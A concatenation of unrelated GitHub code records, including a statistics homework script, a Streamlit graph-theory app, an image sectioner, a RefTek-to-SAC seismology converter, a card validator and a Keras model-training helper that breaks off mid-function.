-*-\n\"\"\"\nCreated on Tue Aug 20 19:44:33 2013\n\n@author: joshua\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Exercise 1\n# \n# In this exercise, we demonstrat the Central Limit Theorem, where each X_i is\n# exopential.\n#\n# a. Generate 100 random numbers from the expoential distribution where\n# lambda=6. Plot them in a histogram. This should give you an idea of what the\n# exponential distribution looks like.\n\nexponential_pop = np.array([np.random.exponential(1/6.) for i in range(1000)])\n# plt.hist(exponential_pop)\n\n# b - e have been combined since they all go together in practice.\n#\n# b. For n = 2 generate a thousand n sized-samples from the previously cited \n# distribution. Compute the sample mean of the n numbers and standardize it \n# using the true mean and standard deviation of the distribution. Repeat for \n# n = 10, 20, and 100. Put all four in plots.\n\ntrue_mean = 1/6.\ntrue_std = 1 / 6.**2\n\ndef standardize(number):\n return (number - true_mean) / true_std\n\nfor sample_size in [10, 20, 100]:\n sample_means = []\n for i in range(1000):\n sample = [np.random.exponential(1/6.) for i in range(sample_size)]\n sample_avg = np.mean(sample)\n standardized_avg = standardize(sample_avg)\n sample_means.append(standardized_avg)\n \n plt.hist(sample_means)\n","repo_name":"jColeChanged/MIT","sub_path":"Statistical Thinking and Data Analysis 15.075/assignment_2.py","file_name":"assignment_2.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5325545019","text":"# from Module 3\n\nmy_list = [10, 1, 8, 3, 5]\nlength = len(my_list)\n\nfor i in range(length // 2):\n my_list[i], my_list[length - i - 1] = my_list[length - i - 1], my_list[i]\n\nprint(my_list)\n\n # we've assigned the length variable with the current list's length (this makes our code a bit clearer and shorter)\n # we've launched the for loop to run through its body length // 2 times (this works well for lists with both even and,' \\\n # ' odd lengths, because when the list contains an odd number of elements, the middle one remains untouched)\n # we've swapped the ith element (from the beginning of the list) with the one with an index equal to (length - i - 1) ' \\\n # '(from the end of the list); in our example, for i equal to 0 the (lenght - i - 1) gives 4; for i equal to 1, it gives 3 - this is exactly what we needed.","repo_name":"aitimis/PythonCourse","sub_path":"CourseApps/SwapElemLists.py","file_name":"SwapElemLists.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"28836306325","text":"import streamlit as st\nfrom graph_utils import Graph, open_graph_txt, MinimumPath, Components\nfrom graph_utils import DFSL as DFS\nfrom graph_utils import BFSL as BFS\n\nimport mpu\nimport base64\nimport json\nimport numpy as np\nimport pandas as pd\nimport os\n\ndef get_table_download_link_csv(df, filename=\"file.txt\", label=\"Download file\", index=False):\n csv = df.to_csv(index=index).encode()\n b64 = base64.b64encode(csv).decode()\n href = f'{label}'\n return href\n\ndef main():\n st.title(\"COS242 - Primeiro trabalho prático\")\n st.header(\"UFRJ - Escola Politécnica - Eng. de Computação e Informação\")\n menu = [\"Carregar grafo\", \"Representação do grafo\", \"Estatísticas\", \n \"BFS\", \"DFS\", \"Caminhos mínimos\", \"Componentes conexas\"]\n choice = st.sidebar.selectbox(\"Opções\", menu)\n \n graph_txt = None\n graph = None\n\n \n\n if choice == \"Carregar grafo\":\n st.subheader(\"Carregar um grafo através de um arquivo txt\")\n st.markdown(\"\"\"\n
\n

Faça upload de um arquivo contendo um grafo, onde a primeira linha é o número de vértices, as próximas linhas são as arestas, e a última linha em branco ou com um ponto.

\n

Exemplo:

\n

3
1 2
2 3
.

\n
\n \"\"\", unsafe_allow_html = True)\n graph_txt = st.file_uploader(\"Upload do Grafo (.txt)\", type=\"txt\")\n if graph_txt:\n graph_txt_button = st.button(\"Ler Grafo\")\n if graph_txt_button:\n graph = open_graph_txt(graph_txt)\n graph.sort_neighbors()\n mpu.io.write(\"graph.pickle\", graph)\n st.success(f\"Grafo com {graph.n_nodes} nós carregado com sucesso!\")\n st.header(\"Limpar grafo\")\n limpar = st.button(\"Limpar\")\n if limpar:\n try:\n os.remove(\"graph.pickle\")\n except:\n pass\n st.success(\"Grafo excluído com sucesso!\")\n \n elif choice == \"Representação do grafo\":\n st.subheader(\"Representação do grafo\")\n st.markdown(\"\"\"\n
\n

Um grafo pode ser tanto representado como uma matriz de adjacência, como listas de adjacência.

\n

Escolha a opção desejada para baixar o arquivo de representação.

\n
\n \"\"\", unsafe_allow_html = True)\n try:\n graph = mpu.io.read(\"graph.pickle\")\n matriz = st.button(\"Gerar matriz de adjacência\")\n listas = st.button(\"Gerar listas de adjacência\")\n if matriz:\n st.success(\"Matriz de adjacência gerada com sucesso!\")\n st.markdown(get_table_download_link_csv(graph.get_matrix_beautiful(), \"matriz.csv\", \"Download matriz de adjacência (.csv)\", index=True), \n unsafe_allow_html=True)\n if listas:\n lista_json = json.dumps(graph.get_node_edges()).encode()\n b64 = base64.b64encode(lista_json).decode()\n href = f'Download listas de adjacência (.txt)'\n st.success(\"Listas de adjacência gerada com sucesso!\")\n st.markdown(href, unsafe_allow_html=True)\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n \n elif choice == \"Estatísticas\":\n st.header(\"Estatísticas do grafo\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n st.markdown(f\"\"\"\n
\n

Número de vértices: {int(graph.n_nodes)}

\n

Número de arestas: {int(graph.get_matrix().sum()/2)}

\n

Grau mínimo: {int(graph.get_matrix().sum(axis=0).min())}

\n

Grau máximo: {int(graph.get_matrix().sum(axis=0).max())}

\n

Grau médio: {graph.get_matrix().sum(axis=0).mean()}

\n

Mediana do Grau: {np.median(graph.get_matrix().sum(axis=0))}

\n
\n \"\"\", unsafe_allow_html = True)\n\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n\n elif choice == \"BFS\":\n st.header(\"Busca em lagura (BFS)\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n st.text(f\"Escolha qual nó para ser a raiz (1 - {graph.n_nodes}) e pressione Enter para atualizar o valor\")\n root = st.text_input(\"Raiz\", 1)\n if root:\n button = st.button(\"Rodar BFS\")\n if button:\n try:\n bfs = BFS(graph, int(root))\n bfs.search()\n st.success(f\"BFS rodada com sucesso!\")\n st.markdown(get_table_download_link_csv(pd.DataFrame(list(zip(range(1, bfs.graph.n_nodes+1), bfs.level, bfs.parent)), columns=[\"node\", \"level\", \"parent\"], index=np.arange(1, bfs.graph.n_nodes+1)),\n f\"bfs_{root}.csv\", f\"Download BFS do vértice {root} (.csv)\"), unsafe_allow_html=True)\n except:\n st.error(\"Raiz informada não contém no grafo.\")\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n\n elif choice == \"DFS\":\n st.header(\"Busca em profundidade (DFS)\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n st.text(f\"Escolha qual nó para ser a raiz (1 - {graph.n_nodes}) e pressione Enter para atualizar o valor\")\n root = st.text_input(\"Raiz\", 1)\n if root:\n button = st.button(\"Rodar DFS\")\n print(root)\n if button:\n try:\n dfs = DFS(graph, int(root))\n dfs.search()\n st.success(f\"DFS rodada com sucesso!\")\n st.markdown(get_table_download_link_csv(pd.DataFrame(list(zip(range(1, dfs.graph.n_nodes+1), dfs.level, dfs.parent)), columns=[\"node\", \"level\", \"parent\"], index=np.arange(1, dfs.graph.n_nodes+1)),\n f\"dfs_{root}.csv\", f\"Download DFS do vértice {root} (.csv)\"), unsafe_allow_html=True)\n except:\n st.error(\"Raiz informada não contém no grafo.\")\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n \n elif choice == \"Caminhos mínimos\":\n st.header(\"Calcular distância entre dois nós\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n minpath = MinimumPath(graph) \n v = st.text_input(\"Origem\", 1)\n w = st.text_input(\"Destino\", 2)\n button = st.button(\"Calcular\")\n if button and minpath:\n st.text(f\"Diâmetro do grafo: {minpath.get_diameter()}\")\n st.text(f\"Distância entre {v} e {w}: {minpath.get_distance(int(v), int(w))}\")\n st.header(\"Distância entre todos os vértices\")\n st.markdown(get_table_download_link_csv(minpath.get_matrix_beautiful(), \"distancias.csv\", \"Download matriz com todas as distâncias (.csv)\", index=True), unsafe_allow_html=True)\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n\n elif choice == \"Componentes conexas\":\n st.header(\"Componentes conexas\")\n try:\n graph = mpu.io.read(\"graph.pickle\")\n button = st.button(\"Gerar componentes conexas\")\n if button:\n components = Components(graph)\n components_dict = {len(x):x for x in components.components}\n components_json = json.dumps(components_dict).encode()\n b64 = base64.b64encode(components_json).decode()\n href = f'Download das componentes (.txt) '\n st.success(f\"Componentes geradas com sucesso!\")\n st.markdown(href, unsafe_allow_html=True)\n except:\n st.error(\"Você ainda não carregou o grafo. Escolha a opção 'Carregar grafo' no menu e carregue seu grafo.\")\n \n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n st.text(\"\")\n st.text(\"Criado por Henrique Chaves e Pedro Boechat - 2020.2\")\n\n if not graph:\n st.sidebar.text(\"Nenhum grafo carregado.\")\n \n else:\n st.sidebar.text(f\"Grafo com {graph.n_nodes} vértices carregado.\")\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n\n","repo_name":"henchaves/cos242-graph-theory","sub_path":"project_01/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8820,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10618084960","text":"import errno\nimport os\n\nfrom .file_storage import FileStorage\n\n\nclass LocalStorage(FileStorage):\n\tdef __init__(self, app):\n\t\tsuper().__init__(app)\n\n\tdef exists(self, path: str):\n\t\treturn os.path.exists(self.full_path(path))\n\n\tdef save(self, path: str, payload):\n\t\tpath = self.full_path(path)\n\n\t\tdirname = os.path.dirname(path)\n\n\t\tif not os.path.exists(dirname):\n\t\t\ttry:\n\t\t\t\tos.makedirs(dirname)\n\t\t\texcept OSError as e:\n\t\t\t\tif e.errno != errno.EEXIST:\n\t\t\t\t\traise\n\n\t\tif not os.path.isdir(dirname):\n\t\t\traise IOError('Not a directory')\n\n\t\ttry:\n\t\t\tfile = open(path, \"wb\")\n\t\t\tfile.write(payload)\n\t\t\tfile.close()\n\t\texcept IOError:\n\t\t\traise RuntimeError(\"Failed to save file\")\n\n\tdef load(self, path: str):\n\t\ttry:\n\t\t\tfile = open(self.full_path(path), \"rb\")\n\t\t\tdata = file.read()\n\t\texcept IOError:\n\t\t\traise RuntimeError(\"Failed to load file {}\".format(path))\n\n\t\treturn data\n","repo_name":"XertDev/book_repository","sub_path":"book_repository/extensions/file_provider/file_storage/local_storage.py","file_name":"local_storage.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25957341811","text":"import numpy as np\r\nimport os\r\nimport cv2 as cv\r\n\r\ndef sectioner(img, section, folder):\r\n \"\"\"This function designates which part is saved, and saves it to the assigned folder\"\"\"\r\n if section == '1':\r\n img = img[0:480,0:640]\r\n elif section == '2':\r\n img = img[0:480, 640:1280]\r\n elif section == '3':\r\n img = img[0:480, 1280:1920]\r\n elif section == '4':\r\n img = img[480:960, 0:640]\r\n elif section == '5':\r\n img = img[480:960, 640:1280]\r\n elif section == '6':\r\n img = img[480:960, 1280:1920]\r\n\r\n cv.imwrite(folder, img)\r\n\r\ndef line_drawer(img):\r\n cv.line(img, (0, 480), (1920, 480), (255, 0, 0), 3)\r\n cv.line(img, (640, 0), (640, 960), (255, 0, 0), 3)\r\n cv.line(img, (1280, 0), (1280, 960), (255, 0, 0), 3)\r\n return img\r\n\r\ndef main():\r\n print(\"\"\"\r\n Sections\r\n 1 - Top Left\r\n 2 - Top Middle\r\n 3 - Top Right\r\n 4 - Bottom Left\r\n 5 - Bottom Middle\r\n 6 - Bottom Right\r\n \"\"\")\r\n section = None\r\n file_images = os.listdir('train_file') # load the images as a list\r\n image_index = 0 # start from first image\r\n viable_strings = ['1', '2', '3', '4', '5', '6', 'None'] # display available options for input\r\n print(\"Press q to quit the program\")\r\n input(\"\\nPress Enter to begin\")\r\n while (image_index < len(file_images))and (section != 'q'):\r\n img = cv.imread('train_file/'+file_images[image_index])\r\n img = img[60:1020, 0:1920]\r\n line_drawer(img)\r\n img = cv.resize(img, (1300, 650))\r\n cv.imshow(file_images[image_index], img)\r\n cv.waitKey(0)\r\n\r\n # if cv.waitKey(100) and 0xFF == 32:\r\n # cv.destroyAllWindows()\r\n section = input(\"Which section is the part in?: \")\r\n img = cv.imread('train_file/'+file_images[image_index])\r\n img = img[60:1020, 0:1920]\r\n if section in viable_strings:\r\n if section == 'None':\r\n pass\r\n else:\r\n folder = 'train_file_save/sectioned_'+file_images[image_index]\r\n sectioner(img, section, folder)\r\n cv.destroyAllWindows()\r\n image_index += 1\r\n\r\n elif section == 'q':\r\n break\r\n else:\r\n print(\"That is not a viable option\")\r\n print(\"Exiting the program\")\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n print(\"\\nthis is a component program, not the main program\")\r\n\r\n\r\n","repo_name":"rip3045/VisionSystem","sub_path":"image_sectioner.py","file_name":"image_sectioner.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"26724755945","text":"import os\nimport pexpect\nimport obspy\nimport numpy as np\n\nfrom datetime import datetime, timezone, timedelta\nimport glob\nimport subprocess\n\ndef scan_data_holding(path):\n result=[]\n for day in glob.glob(os.path.join(path,\"???????\") ):\n d=os.path.split(day)[-1]\n for f in glob.glob(os.path.join(day, '????', '1', '*')) :\n t=os.path.split(f)[-1]\n tt, duration = t.split('_')\n duration=int(duration, 16)\n t0=datetime.strptime(d + tt, \"%Y%j%H%M%S%f\")\n t1=t0+ timedelta(milliseconds=duration)\n result.append( (f,[t0, t1]) )\n\n return result\n\ndef fetch_data(pool):\n \n in_dir = pool.pars['input_dir']\n out_dir = pool.pars['output_dir']\n out_format = pool.pars['output_data_format']\n\n ##tempory diretory to store\n pool.pars[\"tmp_dir\"] = \"__reftek_temp_dir__\"\n if not os.path.exists(pool.pars[\"tmp_dir\"]):\n os.makedirs(pool.pars[\"tmp_dir\"])\n\n #for key, station in pool.stations.items():\n\n ##do not need anymore at present\n #station[\"local_data_holding\"]=scan_data_holding(os.path.join(in_dir, station[\"network\"].strip(), station[\"name\"].strip()))\n\n for sId, eId in pool.all_data:\n station = pool.stations[sId]\n event = pool.events[eId]\n rr = {}\n\n stnet = station[\"network\"].strip()\n stnm = station[\"name\"].strip()\n\n if pool.pars[\"data_apply_mode\"] == \"per_station\":\n if not os.path.exists(os.path.join(out_dir, stnet, stnm)):\n os.makedirs(os.path.join(out_dir, stnet, stnm))\n out_path = os.path.join(out_dir, stnet, stnm)\n elif pool.pars[\"data_apply_mode\"] == \"per_event\":\n if not os.path.exists(os.path.join(out_dir, str(eId))):\n os.makedirs(os.path.join(out_dir, str(eId)))\n out_path = os.path.join(out_dir, 'event' + str(eId))\n \n t0=pool.all_data[(sId, eId)][\"time_range\"][0]\n t1=pool.all_data[(sId, eId)][\"time_range\"][1]\n\n tr=fetch_reftek_data(station, pool.pars, t0, t1 )\n if len(tr)==0: #data not found\n continue\n\n if out_format.lower().strip() == \"sac\":\n\n p=os.path.join(out_path, station[\"network\"] +\".\"+ station[\"name\"] + \".\" + t1.strftime(\"%Y%j%H%M%S\"))\n add_sac_head(tr, station, event)\n\n ##for masked trace data, not needed anymore\n # for trace in tr:\n # if isinstance(trace.data, np.ma.masked_array):\n # trace.data = trace.data.filled()\n tr.write(p+\".sac\", format=\"SAC\")\n elif out_format.lower().strip() == \"segy\":\n pass\n else:\n pass\n return \n\ndef add_sac_head(stream, station, event):\n\n head={}\n head[\"kstnm\"]=station[\"name\"]\n head[\"stla\"]=station[\"latitude\"]\n head[\"stlo\"]=station[\"longitude\"]\n head[\"evla\"]=event[\"latitude\"]\n head[\"evlo\"]=event[\"longitude\"]\n head[\"evdp\"]=event[\"depth\"]\n head[\"mag\"]=event[\"magnitude\"]\n\n #for vertical Z component\n head[\"cmpinc\"]=0\n head[\"kcmpnm\"]=\"Z\"\n head[\"cmpaz\"]=0\n stream[0].stats.sac = head\n stream[0].stats.station=station[\"name\"]\n stream[0].stats.network = station[\"network\"]\n stream[0].stats.channel = \"Z\"\n\n #for N component\n head[\"cmpinc\"]=90\n head[\"kcmpnm\"]=\"N\"\n head[\"cmpaz\"]=0\n stream[1].stats.sac=head\n stream[0].stats.station = station[\"name\"]\n stream[0].stats.network = station[\"network\"]\n stream[0].stats.channel = \"N\"\n\n #for E component\n head[\"cmpinc\"]=90\n head[\"kcmpnm\"]=\"E\"\n head[\"cmpaz\"]=90\n stream[2].stats.sac=head\n stream[0].stats.station = station[\"name\"]\n stream[0].stats.network = station[\"network\"]\n stream[0].stats.channel = \"E\"\n\ndef fetch_reftek_data(station,pars, t0, t1):\n tr = obspy.Stream()\n\n #clean up the tmp_dir\n for f in glob.glob(os.path.join(pars[\"tmp_dir\"], \"*\")):\n os.remove(f)\n\n in_dir = pars['input_dir']\n out_dir = pars['output_dir']\n out_format = pars['output_data_format']\n out_path=os.path.join(out_dir, station[\"network\"], station[\"name\"])\n\n t0=t0.strftime('%Y:%j:%H:%M:%S.%f')\n t1=t1.strftime('%Y:%j:%H:%M:%S.%f')\n cmd = \"arcfetch \" + os.path.join(in_dir, station[\"network\"], station[\"name\"]) + \" -C *,*,*,\" + t0 + \",\" + t1 + \" \"+ os.path.join( pars[\"tmp_dir\"],\"lqm.rt\")\n\n status, output = subprocess.getstatusoutput(cmd)\n if \"No archive error\" in output:\n print(cmd)\n print(output)\n print(\"Please check the data archive have the right archive.sta file. \")\n print('If not, use commond \"arcrebuild -Ypass \" to rebuild it.')\n exit(1)\n\n\n if out_format.lower().strip() == \"sac\":\n cmd = \"pas2sac \"+ os.path.join( pars[\"tmp_dir\"],\"lqm.rt\") +\" \"+ pars[\"tmp_dir\"]\n status, output = subprocess.getstatusoutput(cmd)\n elif out_format.lower() == \"asc\":\n os.system(\"pas2asc \"+os.path.join( pars[\"tmp_dir\"],\"lqm.rt\") +\" \"+ pars[\"tmp_dir\"])\n elif out_format.lower() == \"msd\":\n os.system(\"pas2msd \"+os.path.join( pars[\"tmp_dir\"],\"lqm.rt\") + \" \"+pars[\"tmp_dir\"])\n elif out_format.lower() == \"segy\":\n os.system(\"pas2segy \"+ os.path.join( pars[\"tmp_dir\"],\"lqm.rt\")+ \" \" + pars[\"tmp_dir\"])\n\n for f in glob.glob(os.path.join(pars[\"tmp_dir\"], t0[0:4]+\"*\")):\n tr+=obspy.read(f)\n\n\n\n return tr\n\n\ndef fetch_data_by_obspy(t1, t2, station):\n ##failed, due to the obspy do not fully support reftek data\n tr = obspy.Stream()\n file_list=find_match_files(t1,t2, station)\n\n if not file_list: ### no file found\n return tr\n\n for f in file_list:\n tr+=obspy.read(f, component_codes=[\"Z\",\"N\",\"E\"])\n tr.merge(method=1, interpolation_samples=0)\n\n T1=obspy.UTCDateTime(t1.replace(tzinfo=timezone.utc).timestamp() )\n T2=obspy.UTCDateTime(t2.replace(tzinfo=timezone.utc).timestamp() )\n tr.trim(T1, T2)\n return tr\n\n \ndef find_match_files(t1,t2, station):\n result=[]\n station[\"local_data_holding\"]\n for path, [tt1, tt2] in station[\"local_data_holding\"]:\n if not (tt2\")\n str0 = \"read \" + item[\"path\"] + \"/\" + item[\"time\"].strftime(\"%Y%j%H%M%S\") + \"*\"\n sac.sendline(str0)\n\n sac.expect(\"SAC>\")\n str0 = \"ch \" + \" evla \" + str(item['event'][\"latitude\"]) + \\\n \" evlo \" + str(item['event'][\"longitude\"]) + \\\n \" evdp \" + str(item['event'][\"depth\"])\n sac.sendline(str0)\n\n sac.expect(\"SAC>\")\n sac.sendline(\"wh\")\n\n sac.expect(\"SAC>\")\n sac.sendline(\"q\")\n\n return 0\n","repo_name":"FrankLiu007/obspyDQ","sub_path":"obspyDQ/reftek.py","file_name":"reftek.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72341183846","text":"from string import ascii_lowercase, digits\n\nclass CardCheck:\n CHARS_FOR_NAME = ascii_lowercase.upper() + digits\n @classmethod\n def check_card_number(cls, number):\n if len(number.split(sep='-')) == 4 and len(set(number.replace('-','')) - set(cls.CHARS_FOR_NAME)) == 0 and len(number) == 19 and number.replace('-', '').isdigit():\n return True\n else:\n return False\n\n @classmethod\n def check_name(cls, name):\n if len(name.split(sep=' ')) == 2 and len(set(name.replace(' ', '')) - set(cls.CHARS_FOR_NAME)) == 0:\n return True\n else:\n return False\n\nis_number = CardCheck.check_card_number(\"1234-5678-9012-0000\")\nis_name = CardCheck.check_name(\"SERGEI BALAkIREV\")\nprint(is_name, is_number)\n","repo_name":"vbogoduhov/OOP_Python_stepik","sub_path":"1. Первые шаги в ООП/1.7 Методы класса и статические методы/ex_1.7.8.py","file_name":"ex_1.7.8.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71645696805","text":"import sys\nimport cv2\n\nfrom kernel.model.baidu_pp_wrapper import PpDetection, PpOCR\n\n\nclass PPWrapperTest:\n def __init__(self):\n self.pp_detection_test = PpDetection()\n self.pp_ocr_test = PpOCR()\n\n def test_predict_video(self, camera_id):\n \"\"\"\n Test identification object\n\n @param camera_id: Camera port number\n \"\"\" \n capture = cv2.VideoCapture(camera_id)\n \n index = 1\n while 1:\n ret, frame = capture.read()\n if not ret:\n break\n print('detect frame:%d' % (index))\n index += 1\n \n im,results = self.pp_detection_test.detect_img(frame)\n for box in results['boxes']:\n\n # Class, English, Chinese\n label_id = box[0].astype(int)\n print('##', label_id, self.pp_detection_test.labels_en[label_id], self.pp_detection_test.labels_zh[label_id-1])\n\n if camera_id != -1:\n cv2.imshow('Mask Detection', im)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n def test_ocr(self, input_path):\n \"\"\"\n test ocr read image text\n\n \"\"\"\n image_dir = input_path\n img = cv2.imread(image_dir)\n src_im, text_list = self.pp_ocr_test.ocr_image(img)\n print(text_list)\n cv2.imwrite('../../sample/test_ocr.jpg', src_im)\n\n\nif __name__ == '__main__':\n pp_wrapper_test = PPWrapperTest()\n pp_wrapper_test.test_ocr(input_path=\"../../sample/test.png\")\n pp_wrapper_test.test_predict_video(0)\n","repo_name":"CrashKingOrz/ppReader-Kernel","sub_path":"kernel/test/pp_wrapper_test.py","file_name":"pp_wrapper_test.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9057099475","text":"from BaseModel import BaseModel\nfrom Defintions import Defintions\nimport DatabaseLayer\n\n\n\nclass StoryModels(BaseModel):\n \"\"\"\n This will be the base class for all of models that are used as parts of \n other models. Maily, this will refer to Zone and Monster.\n\n Do not try to use this class directly. Only use its subclasses\n \"\"\"\n \n \n\n @classmethod\n def construct_model_from_dict(cls,dict):\n \"\"\"\n args:\n dict:\n loads the properties of the model from the dict.\n\n return: an instance of the model on which this is called\n\n \"\"\"\n obj = cls(None)\n obj.dict = dict\n return obj\n\n def __init__(self,definitionKey):\n \"\"\"\n args:\n definitionKey:\n a string dictionary key used with one the definition classes. The hashed value\n is a sub-dict that contains the definition info\n\n \"\"\"\n super().__init__()\n self._definition = None\n if not definitionKey:\n return\n self.definitionKey = definitionKey\n\n def set_common_story_property(self,key,value):\n \"\"\"\n I noticed that I was using the same two lines all over my setters.\n So, I decided to just centralize it here.\n \"\"\"\n self.dict[key] = value\n self._changes[self.get_dbFields().OWNER_PROPERTY + \".\" +key] = value\n\n","repo_name":"joelliusczar/SpaceHabit","sub_path":"SpaceHabitRPG/Models/StoryModels.py","file_name":"StoryModels.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6028627541","text":"import time\nimport pandas as pd\nimport os\nimport numpy as np\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__)))\nfrom vutils import load_settings\nfrom keras import models, Input, Model\nfrom keras.callbacks import EarlyStopping\n\n\nsettings = load_settings()\nlabels2int = {b: a for a, b in enumerate(settings[\"labels\"])}\n\nlandmark_indices = [0, 11, 12, 13, 14, 15, 16, 23, 24]\n\n\n# convert landmarks to only selected landmarks\ndef convert(landmarks):\n result = []\n for index in landmark_indices:\n landmark = landmarks[index]\n \"\"\"without visibility\"\"\"\n result.extend([landmark.x, landmark.y, landmark.z])\n \"\"\"with visibility\"\"\"\n # result.extend([landmark.x, landmark.y, landmark.z, landmark.visibility])\n return result\n\n\n# offset according to previous frame\ndef offset(curr, prev):\n \"\"\"without visibility\"\"\"\n result = [a - b for a, b in zip(curr, prev)]\n \"\"\"with visibility\"\"\"\n # result = [v[0] - v[1] if i%4!=3 else v[0] for i, v in enumerate(zip(curr, prev))]\n return result\n\n\ndef convert_df_labels(df1, labels2int):\n df = df1.copy()\n for i in range(len(df)):\n label = df[\"label\"][i]\n df.at[i, \"label\"] = labels2int[label]\n return df\n\n\ndef split_data_with_label(df, valid_size, test_size):\n df_input = df.copy()\n df_target = df_input.pop(\"label\")\n groups = {}\n current_group_label = None\n current_group = []\n for i, row in enumerate(df_input.itertuples(index=False)):\n if current_group_label is None:\n current_group_label = df_target[i]\n if current_group_label == df_target[i]:\n current_group.append(row)\n else:\n groups[current_group_label] = groups.get(current_group_label, [])\n groups[current_group_label].append(current_group)\n current_group_label = df_target[i]\n current_group = []\n if len(current_group):\n groups[current_group_label] = groups.get(current_group_label, [])\n groups[current_group_label].append(current_group)\n\n x_train, x_valid, x_test = [], [], []\n y_train, y_valid, y_test = [], [], []\n for label, group in groups.items():\n # random.shuffle(group)\n combined = [j for i in group for j in i]\n n_test = int(len(combined) * test_size)\n n_valid = int(len(combined) * valid_size)\n n_train = len(combined) - n_test - n_valid\n for i in range(len(combined)):\n (\n x_train if i < n_train else x_valid if i < n_train + n_valid else x_test\n ).append(combined[i])\n (\n y_train if i < n_train else y_valid if i < n_train + n_valid else y_test\n ).append(label)\n return (\n np.array(x_train),\n np.array(y_train),\n np.array(x_valid),\n np.array(y_valid),\n np.array(x_test),\n np.array(y_test),\n )\n\n\ndef split_data_without_label(df, valid_size, test_size):\n df_input = df.copy()\n df_target = df_input.pop(\"label\")\n x_train, x_valid, x_test = [], [], []\n y_train, y_valid, y_test = [], [], []\n n_test = int(len(df_input) * test_size)\n n_valid = int(len(df_input) * valid_size)\n n_train = len(df_input) - n_test - n_valid\n for i, row in enumerate(df_input.itertuples(index=False)):\n (\n x_train if i < n_train else x_valid if i < n_train + n_valid else x_test\n ).append(row)\n (\n y_train if i < n_train else y_valid if i < n_train + n_valid else y_test\n ).append(df_target[i])\n return [(x_train, y_train), (x_valid, y_valid), (x_test, y_test)]\n\n\ndef split_data(DATA, VALID_RATIO, TEST_RATIO):\n DBs = [\n pd.read_csv(os.path.join(\"data\", f\"{name}.csv\"), index_col=0) for name in DATA\n ]\n DB = pd.concat(DBs, axis=0, ignore_index=True, sort=False)\n DB = convert_df_labels(DB, labels2int)\n\n return split_data_without_label(DB, VALID_RATIO, TEST_RATIO)\n\n\ndef group_data(data, group_size, target_function):\n x, y = data\n x_result = []\n y_result = []\n x_temp = []\n y_temp = []\n for i in x:\n x_temp.append(i)\n if len(x_temp) == group_size:\n x_result.append(x_temp)\n x_temp = []\n for i in y:\n y_temp.append(i)\n if len(y_temp) == group_size:\n # result.append(sum(y_temp) / group_size / 2)\n y_result.append(target_function(y_temp))\n y_temp = []\n\n return np.array(x_result), np.array(y_result)\n\n\nclass ModelOperation:\n def __init__(\n self,\n model_class,\n data,\n max_epochs=100,\n valid_ratio=0.1,\n test_ratio=0.1,\n early_stop_valid_patience=10,\n early_stop_train_patience=5,\n num_train_per_config=10,\n loss='mse',\n metrics=['mse'],\n verbose=0,\n test_data=None\n ):\n self.max_epochs = max_epochs\n self.early_stop_valid_patience = early_stop_valid_patience\n self.early_stop_train_patience = early_stop_train_patience\n self.num_train_per_config = num_train_per_config\n self.loss= loss\n self.metrics = metrics\n self.verbose = verbose\n\n self.counter = 0\n self.model_class = model_class\n self.base_model = model_class.model\n self.preprocess = False\n self.preprocessor = None\n self.layer_options = [None] * len(self.base_model.layers)\n\n # x_train, y_train, x_valid, y_valid, x_test, y_test\n self.raw_data = split_data(data, valid_ratio, test_ratio)\n self.test_data = test_data\n\n\n self.defalut_params = {\n \"batchsize\": 16,\n \"timestamp\": 32,\n \"optimizer\": \"adam\",\n \"preprocess\": None,\n }\n\n self.model = None\n self.final_data = None\n self.params = self.defalut_params\n self.history = None\n\n def run(self):\n raise Exception(\" method must be defined for ModelOperation\")\n\n def build(self):\n # Reconstruct model\n layers = self.base_model.layers\n input_shape = self.final_data[0][0].shape[1:]\n print(self.final_data[0][0].shape)\n input_layer = Input(shape=input_shape)\n current_layer = input_layer\n for i, option in enumerate(self.layer_options[1:]):\n layer = layers[i + 1]\n config = layer.get_config()\n if option is not None:\n for k, v in option.items():\n config[k] = v\n current_layer = layer.__class__(**config)(current_layer)\n model = Model(inputs=input_layer, outputs=current_layer)\n if self.verbose:\n model.summary()\n return model\n\n def train(self, clean_model):\n (x_train, y_train), (x_valid, y_valid), (x_test, y_test) = 